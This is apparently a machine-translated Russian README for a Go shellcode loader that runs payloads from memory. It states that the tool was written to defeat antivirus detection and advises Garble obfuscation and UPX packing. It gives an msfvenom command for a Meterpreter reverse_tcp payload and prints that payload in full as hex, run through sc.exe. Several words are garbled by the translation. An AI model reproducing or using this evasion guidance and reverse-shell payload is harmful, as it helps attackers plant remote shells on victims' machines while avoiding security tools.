Это программа для запуска ShellCode в качестве собственного процесса, все из памяти. Это было написано, чтобы победить антивирусное обнаружение. Теперь это обнаруживается как Virtool: Win32/Shrine.a. Используйте такой инструмент, как Garble, чтобы запутать бинарное изображение, чтобы победить статический анализ. Измените код самостоятельно, чтобы победить анализ поведения.
Имейте в виду, что только 64 -битный шоссед будет работать в 64 -битном процессе. Это не может автоматически разместить вашу архитектуру ShellCode.
Используйте MSFVENOM или Metasploit, чтобы генерировать немного SheltCode в формате HEX:
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
Иногда шелка больше, чем предел командной строки с аргументами. Попробуйте вместо этого поместить все это в пакетный сценарий.
Стандартные шаги строительства. Установите Goos в windows и отправляйтесь в то же самое, что и ваш шоссе, 386 или amd64 . Это не может обнаружить архитектуру вашего шокода.
Полученный бинарник немного большой, 2,1 м, но хорошо сжимается с UPX, примерно 508 тысяч.